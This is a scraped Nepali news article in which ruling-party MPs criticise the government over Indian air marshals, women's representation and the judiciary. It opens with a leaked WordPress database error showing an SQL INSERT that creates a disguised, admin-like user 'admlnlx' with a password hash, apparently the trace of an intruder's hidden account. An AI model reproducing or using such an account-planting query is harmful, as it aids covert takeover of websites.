WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B18dhV1HKj6jKPDacr5.0TfaYneK7l0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:47:52', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १३ –
बुधबारको संसदमा बैठकमा सत्तारुढ दलकै सांसदले सरकारको कडा अलोचना गरेका छन् । र, दक्षिण प्रभुसँग लम्पसार परेको आरोप लगाएका छन् ।नेपाली कांग्रेसका सांसद धनराज गुरुङले भारतीय एयर मार्सल नेपालमा राख्नु आपत्तिजनक भन्दै नेपालका सुरक्षा निकाय निकम्मा भएका हुन् भनी प्रश्न गरे । उनले भने ‘म सोध्न चाहन्छु ? के नेपालमा सुरक्षा निकायहरु निकम्मा बनेका हुन् ? वा नेपाल सरकार दक्षिण प्रभुका अगाडि लम्पसार परेको हो ?
स्थानीय तहको निर्वाचनमा प्रमुख वा उपप्रमुखमध्ये एक महिला हुनुपर्ने प्रावधानले महिला सशक्तिकरण हुने चर्चा गर्दै ‘राष्ट्रिय एकतालाई बलियो बनाउन दलगत स्वार्थ लिनु नहुनेमा उनले जोड दिए ।
कांग्रेसकै सांसद रामहरि खतिवडाले ‘न्यायपालिका जनताको आस्थाका केन्द्र हो, यसलाई राजनीतिक आस्थाको केन्द्र बनाइनु हुँदैन’ भन्दै ‘देशलाई टुक्राउँछु भनेर हिँड्नेमाथि किन कारबाही हुँदैन ?’ भनी प्रश्न गरे ।
हेर्नुस् भिडियो पनिः
https://www.youtube.com/watch?v=2J1TxEhcPTg